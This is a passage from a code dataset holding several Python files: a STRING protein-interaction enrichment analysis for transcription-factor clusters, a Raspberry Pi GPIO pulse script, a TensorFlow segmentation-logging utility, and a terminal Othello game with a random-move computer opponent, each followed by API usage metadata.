"minerl.herobraine.hero.handler.Handler", "line_number": 115, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 121, "usage_type": "name"}, {"api_name": "minerl.herobraine.hero.handlers.translation.TranslationHandler", "line_number": 121, "usage_type": "name"}]} +{"seq_id": "11425012244", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport gzip\nimport time\nimport warnings\nfrom collections import Counter, defaultdict\nfrom random import shuffle\n\nimport pandas\nimport pandas as pd\nimport seaborn as sns\nfrom scipy.stats import mannwhitneyu, kruskal, wilcoxon, ttest_1samp\n\nwarnings.filterwarnings('ignore')\n\nimport sys\nimport os\nfrom os.path import join\n\nimport numpy as np\nimport configparser\n\n###############################################################\n\nconfig_file = os.path.join(os.path.expanduser('~'),'paths.cfg')\ncfg = configparser.ConfigParser()\ncfg.read(config_file)\n\ncode_path = cfg.get('enhancers', 'code_path')\nsys.path.append(code_path)\n###############################################################\n\nfrom pybedtools import BedTool\nimport matplotlib.pyplot as plt\n\nPROJECT_DIR = \"ROOT_DIR/\"\nPLOTS_DIR = \"ROOT_DIR/plots/HOTs/\"\n\nfrom overbinders.data_prep.basic import load_metadata\nimport requests\nimport json\n\ncl_list = [\n\t[\"ZNF687\", \"ARID4B\", \"MAX\", \"SAP130\"],\n\t[\"KMT2A\", \"E2F4\", \"NONO\", \"HNRNPLL\", \"RBM39\", \"POLR2A\", \"POLR2AphosphoS5\", \"RBFOX2\", \"ARID4A\", \"TAF1\", \"ZFY\",\n\t \"GABPB1\", \"PHF8\", \"POLR2G\", \"NR2C2\", \"DRAP1\", \"YEATS4\", \"HMGXB4\", \"KMT2B\", \"TFDP2\", \"MAZ\", \"SPEN\", \"ASH2L\",\n\t \"KDM2A\", \"MNX1\", \"UBTF\", \"GATAD1\", \"ZNF501\", \"DMAP1\"],\n\t[\"NR2F6\", \"TEAD1\", \"SOX5\", \"NFIL3\", \"HNF4A\", \"FOXA2\", \"PPARG\", \"MIXL1\", \"FOXA1\", \"CEBPG\", \"FOXO1\", \"ZNF217\",\n\t \"CEBPA\", \"KDM1A\", \"FOXP1\", \"RCOR2\"],\n\t[\"ZGPAT\", \"MED1\", \"TFAP4\", \"ZFX\", \"EGR1\", \"LIN54\", \"ZNF574\", \"HDAC1\", \"TBX2\", \"THAP11\", \"KAT8\", \"HOXA3\"],\n\t[\"KLF16\", \"PATZ1\", \"ERF\", \"ZNF331\", \"LCORL\", \"IRF2\", \"SKI\", \"ISL2\", \"ZBTB7B\", \"POGZ\", \"IKZF5\", \"HNF1B\", \"FOSL2\",\n\t \"TCF7L2\", \"RXRB\", \"RARA\", \"LCOR\", \"FOXP4\", \"BCL6\", \"GATAD2A\", \"SOX6\", \"PAXIP1\", \"ELF3\", \"SMAD4\", \"HDAC2\", \"FOXA3\"]\n]\n\nstring_api_url = \"https://string-db.org/api\"\noutput_format = \"tsv\"\nmethod = \"ppi_enrichment\"\n\nall_tfs = list(load_metadata()[\"HepG2\"].keys())\n\nfrom pathlib import Path\n\n\ndef get_enrichment(cl_no=1):\n\n\tsave_dir = Path(os.path.join(PLOTS_DIR, f\"PPI_enrichments/{cl_no}\"))\n\tsave_dir.mkdir(exist_ok=True)\n\n\tparams = {\n\t\t\"identifiers\": \"%0d\".join([_ for _ in cl_list[cl_no - 1]]),\n\t\t\"species\": 9606, # species NCBI identifier\n\t\t\"caller_identity\": \"hudaiber@nih.gov\"\n\t}\n\n\trequest_url = \"/\".join([string_api_url, output_format, method])\n\n\tresponse = requests.post(request_url, data=params)\n\n\tsave_file = save_dir/\"main_PPI.txt\"\n\tprint(save_file)\n\twith open(save_file, \"w\") as of:\n\t\tof.write(response.text)\n\n\tfor i in range(100):\n\n\t\tshuffle(all_tfs)\n\n\t\trand_tfs = all_tfs[:len(cl_list[cl_no-1])]\n\n\t\tparams[\"identifiers\"] = \"%0d\".join(rand_tfs)\n\t\trequest_url = \"/\".join([string_api_url, output_format, method])\n\t\tresponse = requests.post(request_url, data=params)\n\n\t\tsave_file = save_dir/f\"rand_{i+1}_PPI.txt\"\n\t\tprint(save_file)\n\t\twith open(save_file, \"w\") as of:\n\t\t\tof.write(response.text)\n\n\t\ttime.sleep(2)\n\n\ndef 
get_enrichment_stats():\n\n\tsrc_dir = Path(os.path.join(PLOTS_DIR, \"PPI_enrichments/\"))\n\n\tfor i in range(1, 5):\n\n\t\tmain_pvalue = float(open(src_dir/f\"{i}/main_PPI.txt\").readlines()[1].split()[-1])\n\t\trand_pvalues = [float(open(f).readlines()[-1].split()[-1]) for f in (src_dir/f\"{i}\").glob(\"rand_*_PPI.txt\")]\n\n\t\tprint(i, main_pvalue, ttest_1samp(rand_pvalues, main_pvalue))\n\n\t\t# print(main_pvalue, rand_pvalues)\n\n\n", "repo_name": "okurman/HOT", "sub_path": "HOTs/PPI_clusters_analysis.py", "file_name": "PPI_clusters_analysis.py", "file_ext": "py", "file_size_in_byte": 3277, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 25, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 26, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 30, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "overbinders.data_prep.basic.load_metadata", "line_number": 59, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 77, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 86, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 92, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 99, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path", "line_number": 104, "usage_type": "attribute"}, {"api_name": "scipy.stats.ttest_1samp", "line_number": 111, "usage_type": "call"}]} +{"seq_id": "22320741573", "text": "from gpiozero import LED\nfrom time import sleep\n\n'''\nPulse A : GPIO 13\nPulse B : GPIO 26\n'''\n\npulseA = LED(13)\npulseB = LED(26)\npulseA.on()\npulseB.on()\nsleep(0.05)\npulseA.off()\npulseB.off()\n\n#while True:\n #led.on()\n #sleep(0.05)\n #led.off()\n #sleep(0.05)\n", "repo_name": "jwalkerdev/pi-scratch-projects", "sub_path": "py-gpio-001/pulse-74HC123-gpio16.py", "file_name": "pulse-74HC123-gpio16.py", "file_ext": "py", "file_size_in_byte": 267, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "gpiozero.LED", "line_number": 9, "usage_type": "call"}, {"api_name": "gpiozero.LED", "line_number": 10, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "4353637260", "text": "\"\"\"\nModule with logging utilities\n\"\"\"\n\nimport logging\nimport typing\n\nimport cv2\nimport numpy as np\nimport tensorflow as tf\nimport vlogging\n\nimport net.data\nimport net.processing\n\n\ndef log_predictions(\n logger: logging.Logger, prediction_model: tf.keras.Model,\n images: typing.List[np.ndarray], ground_truth_segmentations: typing.List[np.ndarray],\n categories: typing.List[str], target_size: int):\n \"\"\"\n Log a batch of predictions, along with input images and ground truth segmentations\n\n Args:\n logger 
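`get_enrichment_stats()` in the record above compares the main cluster's STRING enrichment p-value against the p-values obtained for random TF sets with a one-sample t-test. The call in isolation, with invented numbers:

```python
# ttest_1samp as used in get_enrichment_stats() above; all values invented.
from scipy.stats import ttest_1samp

rand_pvalues = [0.41, 0.22, 0.35, 0.18, 0.29, 0.33]   # random TF sets
main_pvalue = 0.001                                    # observed cluster
stat, p = ttest_1samp(rand_pvalues, main_pvalue)
print(stat, p)   # large |stat| -> main value far from the random mean
```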
(logging.Logger): logger instance\n prediction_model (tf.keras.Model): prediction model\n images (typing.List[np.ndarray]): list of images to run predictions on\n ground_truth_segmentations (typing.List[np.ndarray]): list of ground truth segmentations\n categories (typing.List[str]): list of segmentation categories\n target_size (int): common size to which all images should be padded for prediction\n \"\"\"\n\n padded_images = np.array([net.processing.pad_to_size(\n image=image,\n size=target_size,\n color=(0, 0, 0)\n ) for image in images])\n\n logger.info(\n vlogging.VisualRecord(\n title=\"images\",\n imgs=[cv2.pyrDown(image) for image in images]\n )\n )\n\n ground_truth_overlays = [\n net.processing.get_segmentation_overlay(\n image=image,\n segmentation=segmentation,\n background_color=(0, 0, 0,)\n ) for image, segmentation in zip(images, ground_truth_segmentations)]\n\n logger.info(\n vlogging.VisualRecord(\n title=\"ground truth segmentations\",\n imgs=[cv2.pyrDown(image) for image in ground_truth_overlays]\n )\n )\n\n indices_to_colors_map = net.data.get_colors_info(categories_count=len(categories))[0]\n\n bgr_predictions = [net.processing.get_dense_segmentation_labels_image(\n segmentation_image=np.argmax(prediction, axis=-1),\n indices_to_colors_map=indices_to_colors_map)\n for prediction in prediction_model.predict(padded_images)]\n\n borderless_bgr_predictions = [net.processing.remove_borders(\n image=prediction,\n target_size=ground_truth_image.shape[:2]\n ) for prediction, ground_truth_image in zip(bgr_predictions, images)]\n\n predictions_overlays = [\n net.processing.get_segmentation_overlay(\n image=image,\n segmentation=segmentation,\n background_color=(0, 0, 0,)\n ) for image, segmentation in zip(images, borderless_bgr_predictions)]\n\n logger.info(\n vlogging.VisualRecord(\n title=\"predictions overlays\",\n imgs=[cv2.pyrDown(image) for image in predictions_overlays]\n )\n )\n", "repo_name": "PuchatekwSzortach/voc_encoder_decoder_with_atrous_separable_convolutions", "sub_path": "net/logging.py", "file_name": "logging.py", "file_ext": "py", "file_size_in_byte": 2737, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.Logger", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 18, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 19, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 19, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "net.data.processing.pad_to_size", "line_number": 33, "usage_type": "call"}, {"api_name": "net.data.processing", "line_number": 33, "usage_type": "attribute"}, {"api_name": "net.data", "line_number": 33, "usage_type": "name"}, {"api_name": "vlogging.VisualRecord", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.pyrDown", "line_number": 42, "usage_type": "call"}, {"api_name": "net.data.processing.get_segmentation_overlay", "line_number": 47, "usage_type": "call"}, {"api_name": "net.data.processing", "line_number": 47, "usage_type": "attribute"}, {"api_name": "net.data", "line_number": 47, "usage_type": "name"}, {"api_name": "vlogging.VisualRecord", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.pyrDown", "line_number": 56, "usage_type": "call"}, {"api_name": "net.data.data.get_colors_info", "line_number": 60, 
"usage_type": "call"}, {"api_name": "net.data.data", "line_number": 60, "usage_type": "attribute"}, {"api_name": "net.data", "line_number": 60, "usage_type": "name"}, {"api_name": "net.data.processing.get_dense_segmentation_labels_image", "line_number": 62, "usage_type": "call"}, {"api_name": "net.data.processing", "line_number": 62, "usage_type": "attribute"}, {"api_name": "net.data", "line_number": 62, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 63, "usage_type": "call"}, {"api_name": "net.data.processing.remove_borders", "line_number": 67, "usage_type": "call"}, {"api_name": "net.data.processing", "line_number": 67, "usage_type": "attribute"}, {"api_name": "net.data", "line_number": 67, "usage_type": "name"}, {"api_name": "net.data.processing.get_segmentation_overlay", "line_number": 73, "usage_type": "call"}, {"api_name": "net.data.processing", "line_number": 73, "usage_type": "attribute"}, {"api_name": "net.data", "line_number": 73, "usage_type": "name"}, {"api_name": "vlogging.VisualRecord", "line_number": 80, "usage_type": "call"}, {"api_name": "cv2.pyrDown", "line_number": 82, "usage_type": "call"}]} +{"seq_id": "24860047862", "text": "from termcolor import colored\nimport numpy as np\nimport random\nimport sys\n\n# view\nboard_row_header = ' a b c d e f g h'\nboard_row_top = '---+---+---+---+---+---+---+---'\nwhite_piece = colored('●', 'white')\nwhite_legal_move = colored('●', 'white', attrs=['blink'])\nblack_piece = colored('●', 'blue')\nblack_legal_move = colored('●', 'blue', attrs=['blink'])\nboard_piece = {0: ' |', 1: ' ' + white_piece + ' |', 2: ' ' + black_piece + ' |'}\n\n# board model - will be an (8, 8) numpy array\nboard = []\n\n# player color global (never changed after opening selection of game)\nhuman_player = 1\ncomputer_player = 2\n\n# move entry validation and input-to-model transformation dicts\nvalid_grid_letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h']\nvalid_grid_numbers = ['1', '2', '3', '4', '5', '6', '7', '8']\nvalid_show_moves = ['show moves', 'show move', 'show', 'moves', 'showmoves', 'showmove']\nletter_to_int = {'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, 'f': 5, 'g': 6, 'h': 7}\n\n# PRINT FUNCTIONS\ndef print_title():\n\tprint(colored('\\n\\n ___ ___ ___ ___ ___ ' +\n\t\t' \\n / /\\ / /\\ ___ / /\\ / /\\ / /\\ ___ ' +\n\t\t' \\n / /::\\ / /:/_ /__/\\ / /:/_ / /::\\ / /:/_ / /\\ ' +\n\t\t' \\n / /:/\\:\\ / /:/ /\\ \\ \\:\\ / /:/ /\\ / /:/\\:\\ / /:/ /\\ / /:/ ' +\n\t\t' \\n / /:/~/:/ / /:/ /:/_ \\ \\:\\ / /:/ /:/_ / /:/~/:/ / /:/ /::\\/__/::\\ ' +\n\t\t' \\n /__/:/ /:/__/__/:/ /:/ /\\___ \\__\\:/__/:/ /:/ //__/:/ /:/__/__/:/ /:/\\:\\__\\/\\:\\__ ' +\n\t\t' \\n \\ \\:\\/:::::\\ \\:\\/:/ /:/__/\\ | |:\\ \\:\\/:/ /:\\ \\:\\/:::::\\ \\:\\/:/~/:/ \\ \\:\\/\\\\ ' +\n\t\t' \\n \\ \\::/~~~~ \\ \\::/ /:/\\ \\:\\| |:|\\ \\::/ /:/ \\ \\::/~~~~ \\ \\::/ /:/ \\__\\::/ ' +\n\t\t' \\n \\ \\:\\ \\ \\:\\/:/ \\ \\:\\__|:| \\ \\:\\/:/ \\ \\:\\ \\__\\/ /:/ /__/:/ ' +\n\t\t' \\n \\ \\:\\ \\ \\::/ \\__\\::::/ \\ \\::/ \\ \\:\\ /__/:/ \\__\\/ ' +\n\t\t' \\n \\__\\/ \\__\\/ ~~~~ \\__\\/ \\__\\/ \\__\\/ \\n \\n' +\n\t\t' by allenhj \\n \\n Welcome to the game \\n', 'green'))\n\n# board that shows only existing moves\ndef print_board(board):\n\n\t# np.where returns 2 same-length numpy arrays of row, col indices\n\tscore_white = len(np.where(board == 1)[0])\n\tscore_black = len(np.where(board == 2)[0])\n\n\tprint(colored(board_row_header, 'green'))\n\tprint(' ' + colored('/' + board_row_top + '\\\\', 'blue'))\n\tfor i in range(0, 8):\n\t\trow = 
colored(str(i+1), 'green') + colored(' |', 'blue')\n\t\t#row = colored(str(i), 'green') + colored(' |', 'blue')\n\t\tfor j in range(0, 8):\n\t\t\trow += board_piece[int(board[i][j])]\n\t\trow = row[:-1] + colored('|', 'blue')\n\t\tif i == 2:\n\t\t\trow += colored('\tScore | ', 'green') + 'White: ' + str(score_white)\n\t\tif i == 3:\n\t\t\trow += colored('\t | ', 'green') + colored('Black: ' + str(score_black), 'blue')\n\t\tprint(row)\n\t\tif i != 7:\n\t\t\tprint(colored(' +', 'blue') + board_row_top + colored('+', 'blue'))\n\tprint(' ' + colored('\\\\' + board_row_top + '/', 'blue'))\n\n# board showing the current player's legal moves\ndef print_possible_moves_board(board, legal_moves, color):\n\tprint('\\n Your legal moves: \\n')\n\tprint(colored(board_row_header, 'green'))\n\tprint(' ' + colored('/' + board_row_top + '\\\\', 'blue'))\n\t# 0-8 for terminal display, 1-9 for debug\n\tfor i in range(0, 8):\n\t\trow = colored(str(i+1), 'green') + colored(' |', 'blue')\n\t\tfor j in range(0, 8):\n\t\t\tif (i, j) in legal_moves:\n\t\t\t\trow += ' ' + white_legal_move + ' |' if color == 'white' else ' ' + black_legal_move + ' |'\n\t\t\telse:\n\t\t\t\trow += board_piece[int(board[i][j])]\n\t\trow = row[:-1] + colored('|', 'blue')\n\t\tprint(row)\n\t\tif i != 7:\n\t\t\tprint(colored(' +', 'blue') + board_row_top + colored('+', 'blue'))\n\tprint(' ' + colored('\\\\' + board_row_top + '/', 'blue'))\n\n# GAME FUNCTIONS\n\n# prepare a new game board\n# set start positions\n# print initial move\ndef prepare_new_game(board):\n\tglobal human_player\n\tglobal computer_player\n\n\tsys.stdout.write(\"\\x1b[8;{rows};{cols}t\".format(rows=18, cols=85))\n\tprint_title()\n\n\t# get player choice\n\tchoice = input('Choose Black or White (Black goes first): ').lower()\n\twhile choice != 'black' and choice != 'white':\n\t\tchoice = input('Invalid entry. Choose Black or White (Black\\n goes first): ').lower()\n\tif choice == 'white':\n\t\thuman_player, computer_player = 1, 2\n\telse:\n\t\thuman_player, computer_player = 2, 1\n\n\t# clear board from previous game\n\tboard = np.zeros(shape=(8,8))\n\n\t# set start positions\n\tboard[3][3] = human_player\n\tboard[3][4] = computer_player\n\tboard[4][3] = computer_player\n\tboard[4][4] = human_player\n\n\tsys.stdout.write(\"\\x1b[8;{rows};{cols}t\".format(rows=48, cols=85))\n\n\tprint('\\n The game has begun \\n Starting Postions: \\n')\n\tprint_board(board)\n\n\t# initial turn\n\n\tif choice != 'black':\n\t\twhite_legal_moves, black_legal_moves = get_legal_moves(board)\n\t\tboard = take_computer_turn(board, (white_legal_moves, black_legal_moves))\n\t\tprint('\\n Computer move: \\n')\n\t\tprint_board(board)\n\n\twhite_legal_moves, black_legal_moves = get_legal_moves(board)\n\treturn board, white_legal_moves, black_legal_moves\n\n# get user input, validate it is a valid grid value and a legal move\ndef take_human_turn(board, legal_moves):\n\tglobal human_player\n\n\tlegal_moves_shown = False\n\tinvalid_entry = False\n\tvalid_entry_not_legal = False\n\tmove_is_legal = False\n\n\twhile move_is_legal == False:\n\t\t# showing possible moves\n\t\tif legal_moves_shown:\n\t\t\tif valid_entry_not_legal:\n\t\t\t\tmove = input('\\n Illegal move. Enter one of the legal move grid values: ').lower()\n\t\t\t\tvalid_entry_not_legal = False\n\t\t\telif invalid_entry:\n\t\t\t\tmove = input('\\n Invalid entry. Valid entries are in form `a2`, `g6`, (i.e. A-H, 1-8). 
Enter: ').lower()\n\t\t\t\tinvalid_entry = False\n\t\t\telse:\n\t\t\t\tmove = input('\\n Choose a move by entering one of the legal move grid values: ').lower()\n\n\t\t\tvalid_entry = (len(move) == 2 and move[0] in valid_grid_letters and move[1] in valid_grid_numbers)\n\n\t\t\tif valid_entry == False:\n\t\t\t\tinvalid_entry = True\n\t\t\telse:\n\t\t\t\tgrid_val = move_to_grid_val(move)\n\t\t\t\tif grid_val in (legal_moves[human_player-1]):\n\t\t\t\t\tmove_is_legal = True\n\t\t\t\t\tboard = update_board(board, grid_val, human_player)\n\t\t\t\telse:\n\t\t\t\t\tvalid_entry_not_legal = True\n\t\t# not showing possible moves\n\t\telse:\n\t\t\tif valid_entry_not_legal:\n\t\t\t\tmove = input('\\n Illegal move. Enter one of the legal move grid\\n values or `Show Moves` for a hint: ').lower()\n\t\t\t\tvalid_entry_not_legal = False\n\t\t\telif invalid_entry:\n\t\t\t\tmove = input('\\n Invalid entry. Valid entries are in form `a2`,\\n `g6`, (i.e. A-H, 1-8) or `Show Moves`: ').lower()\n\t\t\t\tinvalid_entry = False\n\t\t\telse:\n\t\t\t\tmove = input('\\n Choose a move by entering grid value, or enter\\n `Show Moves` to see all legal moves: ').lower()\n\n\t\t\tvalid_entry = (len(move) == 2 and move[0] in valid_grid_letters and move[1] in valid_grid_numbers or move in valid_show_moves)\n\n\t\t\tif valid_entry and move in valid_show_moves:\n\t\t\t\tlegal_moves_shown = True\n\t\t\t\tprint_possible_moves_board(board, legal_moves[human_player-1], 'white' if human_player == 1 else 'black')\n\t\t\telif valid_entry == False:\n\t\t\t\tinvalid_entry = True\n\t\t\telse:\n\t\t\t\tgrid_val = move_to_grid_val(move)\n\t\t\t\tif grid_val in (legal_moves[human_player-1]):\n\t\t\t\t\tmove_is_legal = True\n\t\t\t\t\tboard = update_board(board, grid_val, human_player)\n\t\t\t\telse:\n\t\t\t\t\tvalid_entry_not_legal = True\n\n\treturn board\n\n# choose a random move out of legal moves\n# lots of room for expansion into Othello/Reversi AI algos in a v2\ndef take_computer_turn(board, legal_moves):\n\t# legal_moves is a tuple of white and black legal moves\n\tglobal computer_player\n\n\tif len(legal_moves) == 2 :\n\t\tmove = legal_moves[computer_player - 1][random.randint(0, len(legal_moves[computer_player - 1]) -1)]\n\telif len(legal_moves) == 1:\n\t\t# special case: no opponent moves list, in shape [(n,n)...] instead of [[(n,n)...], [(n,n)...]]\n\t\tmove = legal_moves[0]\n\tboard = update_board(board, move, computer_player)\n\treturn board\n\n# print out the final score and declare a winner\ndef end_game(board):\n\tsys.stdout.write(\"\\x1b[8;{rows};{cols}t\".format(rows=15, cols=69))\n\tprint(colored('\\n\\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~ GAME OVER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~', 'green',))\n\tscore_white = len(np.where(board == 1)[0])\n\tscore_black = len(np.where(board == 2)[0])\n\tline_one = ' ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● '\n\tline_two = '  ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● '\n\tif score_white > score_black:\n\t\tfor i in range(0, 2):\n\t\t\tprint(colored(line_one, 'white', attrs=['blink']))\n\t\t\tprint(colored(line_two, 'white', attrs=['blink']))\n\t\tprint(colored(' ● ● ● ● ● ● ● ', 'white', attrs=['blink']) + \\\n\t\t\t  'White Wins!' 
+ colored(' ● ● ● ● ● ● ● ', 'white', attrs=['blink']))\n\t\tfor i in range(0, 2):\n\t\t\tprint(colored(line_two, 'white', attrs=['blink']))\n\t\t\tprint(colored(line_one, 'white', attrs=['blink']))\n\telif score_black > score_white:\n\t\tfor i in range(0, 2):\n\t\t\tprint(colored(line_one, 'blue', attrs=['blink']))\n\t\t\tprint(colored(line_two, 'blue', attrs=['blink']))\n\t\tprint(colored(' ● ● ● ● ● ● ● ', 'blue', attrs=['blink']) + \\\n\t\t\t colored('Black Wins!', 'blue') + \\\n\t\t\t colored(' ● ● ● ● ● ● ● ', 'blue', attrs=['blink']))\n\t\tfor i in range(0, 2):\n\t\t\tprint(colored(line_two, 'blue', attrs=['blink']))\n\t\t\tprint(colored(line_one, 'blue', attrs=['blink']))\n\telse:\n\t\tline_one = ' '\n\t\tline_two = ' '\n\t\tblue = colored('● ', 'blue', attrs=['blink'])\n\t\twhite = colored('● ', 'white', attrs=['blink'])\n\t\tfor i in range (0, 8):\n\t\t\tline_one += blue + white\n\t\t\tline_two += blue + white\n\t\tline_one += blue\n\t\tfor i in range(0, 2):\n\t\t\tprint(line_one)\n\t\t\tprint(line_two)\n\t\tprint(' ' + (blue + white) * 3 + colored('● ', 'blue', attrs=['blink']) + \\\n\t\t\t colored('● ', 'white', attrs=['blink']) + \\\n\t\t\t 'Tie' + colored(' ● ', 'white', attrs=['blink']) + \\\n\t\t\t colored('● ', 'blue', attrs=['blink']) + ((white + blue) * 3))\n\t\tfor i in range(0, 2):\n\t\t\tprint(line_two)\n\t\t\tprint(line_one)\n\tprint(colored('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~', 'green',))\n\n# start a new game if player wants to play again\ndef play_again():\n\tchoice = input('\\n Play again (`yes`/`no`)?: ').lower()\n\twhile choice not in ('yes', 'no', 'y', 'n', 'ye'):\n\t\tchoice = input('\\n Play again (`yes`/`no`?): ').lower()\n\tif choice[0] == 'y':\n\t\tboard = []\n\t\tplay_game(board)\n\n\n# play game\ndef play_game(board):\n\tboard, white_legal_moves, black_legal_moves = prepare_new_game(board)\n\tif white_legal_moves == False:\n\t\twhite_legal_moves, black_legal_moves = get_legal_moves(board)\n\twhile white_legal_moves and black_legal_moves:\n\t\t# human turn\n\t\tboard = take_human_turn(board, (white_legal_moves, black_legal_moves))\n\t\tprint('\\n Your move: \\n')\n\t\tprint_board(board)\n\n\t\t# recompute legal moves\n\t\twhite_legal_moves, black_legal_moves = get_legal_moves(board)\n\n\t\t# computer turn\n\t\tif white_legal_moves and black_legal_moves:\n\t\t\tboard = take_computer_turn(board, (white_legal_moves, black_legal_moves))\n\t\t\tprint('\\n Computer move: \\n')\n\t\t\tprint_board(board)\n\n\t\t\t# recompute legal moves\n\t\t\twhite_legal_moves, black_legal_moves = get_legal_moves(board)\n\n\tend_game(board)\n\tplay_again()\n\n\n# HELPER FUNCTIONS\n\n# determine legal moves for both players\ndef get_legal_moves(board):\n\twhite_pieces = np.where(board == 1)\n\tblack_pieces = np.where(board == 2)\n\n\twhite_legal_moves = []\n\tblack_legal_moves = []\n\n\tfor color in [('white', white_pieces), ('black', black_pieces)]:\n\t\tpieces = color[1]\n\t\tplayer = 1 if color[0] == 'white' else 2\n\t\topponent = 2 if color[0] == 'white' else 1\n\t\tlegal_moves = []\n\n\t\t# numpy where() result is two np arrays of row and column indices of matches\n\t\tfor piece in zip(pieces[0], pieces[1]):\n\t\t\trow = piece[0]\n\t\t\tcol = piece[1]\n\n\t\t\t# get the box of values surrounding a cell\n\t\t\trect = get_rect(board, row, col)\n\n\t\t\t# get positions in rect that have enemy moves (directions to explore)\n\t\t\t# this way we don't have to check 8 possible move directions for every piece every time!\n\t\t\topponent_pieces = 
np.where(rect == opponent)\n\n\t\t\tfor move in zip(opponent_pieces[0], opponent_pieces[1]):\n\t\t\t\t# normalize 0 to 2 into -1 to 1 to get direction vector\n\t\t\t\ty_direction = move[0] - 1\n\t\t\t\tx_direction = move[1] - 1\n\n\t\t\t\t# to start, move in vector direction two steps (over the opponent piece we just identified)\n\t\t\t\tnew_row = row + y_direction * 2\n\t\t\t\tnew_col = col + x_direction * 2\n\n\t\t\t\t# if cell is empty, stop and add to legal moves\n\t\t\t\t# if piece in cell is your own, stop\n\t\t\t\t# if piece in cell is opponent's, continue\n\t\t\t\t# continue moving one step in direction until empty cell or end of board\n\t\t\t\twhile new_row >= 0 and new_row <= 7 and new_col >= 0 and new_col <= 7:\n\t\t\t\t\tif board[new_row][new_col] == 0:\n\t\t\t\t\t\t# don't add twice if it's already there from another piece's legal moveset\n\t\t\t\t\t\tif (new_row, new_col) not in legal_moves:\n\t\t\t\t\t\t\tlegal_moves.append((new_row, new_col))\n\t\t\t\t\t\tbreak\n\t\t\t\t\telif board[new_row][new_col] == opponent:\n\t\t\t\t\t\tnew_row += y_direction\n\t\t\t\t\t\tnew_col += x_direction\n\t\t\t\t\telse:\n\t\t\t\t\t\t# own piece\n\t\t\t\t\t\tbreak\n\n\t\tif player == 1:\n\t\t\twhite_legal_moves = legal_moves\n\t\telse:\n\t\t\tblack_legal_moves = legal_moves\n\n\treturn white_legal_moves, black_legal_moves\n\n# update the board based on the selected move\ndef update_board(board, grid_val, player):\n\topponent = 2 if player == 1 else 1\n\n\trow = grid_val[0]\n\tcol = grid_val[1]\n\n\t# simpler variant of get_legal_moves() algo\n\trect = get_rect(board, row, col)\n\topponent_pieces = np.where(rect == opponent)\n\n\tfor move in zip(opponent_pieces[0], opponent_pieces[1]):\n\t\t# normalize 0 to 2 into -1 to 1 to get direction vector\n\t\ty_direction = move[0] - 1\n\t\tx_direction = move[1] - 1\n\n\t\t# skip over piece we know is opponent's\n\t\tnew_row = row + y_direction * 2\n\t\tnew_col = col + x_direction * 2\n\n\t\t# add initial opponent piece\n\t\tpieces_to_flip = [(row, col), (row + y_direction, col + x_direction)]\n\n\t\t# if cell is empty, stop\n\t\t# if piece in cell is opponent's, add to pieces_to_flip list and continue\n\t\t# if piece in cell is your own, stop and flip pieces in pieces_to_flip\n\t\t# continue moving one step in direction until above case or end of board\n\t\twhile (new_row >= 0 and new_row <= 7 and new_col >= 0 and new_col <= 7):\n\t\t\tif board[new_row][new_col] == opponent:\n\t\t\t\tpieces_to_flip.append((new_row, new_col))\n\t\t\t\tnew_row += y_direction\n\t\t\t\tnew_col += x_direction\n\t\t\telif board[new_row][new_col] == player:\n\t\t\t\tfor piece in pieces_to_flip:\n\t\t\t\t\tboard[piece[0]][piece[1]] = player\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\t# empty cell\n\t\t\t\tbreak\n\n\treturn board\n\n# change player input to numpy-readable row,col\ndef move_to_grid_val(move):\n\tcol = int(letter_to_int[move[0]])\n\trow = int(move[1])-1\n\treturn (row, col)\n\n# return a square window of pieces adjacent to the selected move\ndef get_rect(board, row, col):\n\t# special cases that limit a moveset:\n\t# \tall of rows 0, 7 and all of cols 0, 7, excluding corners\n\t# \tcorners = (0,0), (0,7), (7,0), (7, 7)\n\t# default: any interior cell (neither row nor col is 0 or 7)\n\t#\n\t# - must be converted into a 3x3 np array to preserve direction\n\t# \tvector functionality\n\t# - check most common to least common case for compute efficiency\n\t#\n\n\tif row > 0 and row < 7 and col > 0 and col < 7:\n\t\t# get immediate square around the piece\n\t\trect = 
